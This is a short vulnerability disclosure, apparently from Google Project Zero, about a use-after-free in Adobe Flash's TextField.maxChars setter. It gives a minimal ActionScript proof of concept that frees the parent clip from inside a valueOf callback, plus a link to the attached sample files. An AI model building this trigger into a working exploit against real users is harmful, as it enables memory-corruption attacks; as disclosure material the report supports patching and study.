28 lines
No EOL
767 B
Text
28 lines
No EOL
767 B
Text
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=581
|
|
|
|
There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:
|
|
|
|
var times = 0;
|
|
var mc = this.createEmptyMovieClip("mc", 101);
|
|
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
|
|
tf.maxChars = {valueOf : func};
|
|
|
|
function func(){
|
|
|
|
if (times == 0){
|
|
times++;
|
|
return 7;
|
|
}
|
|
mc.removeMovieClip();
|
|
|
|
// Fix heap here
|
|
|
|
return 7;
|
|
|
|
}
|
|
|
|
A sample swf and fla are attached.
|
|
|
|
|
|
Proof of Concept:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39650.zip |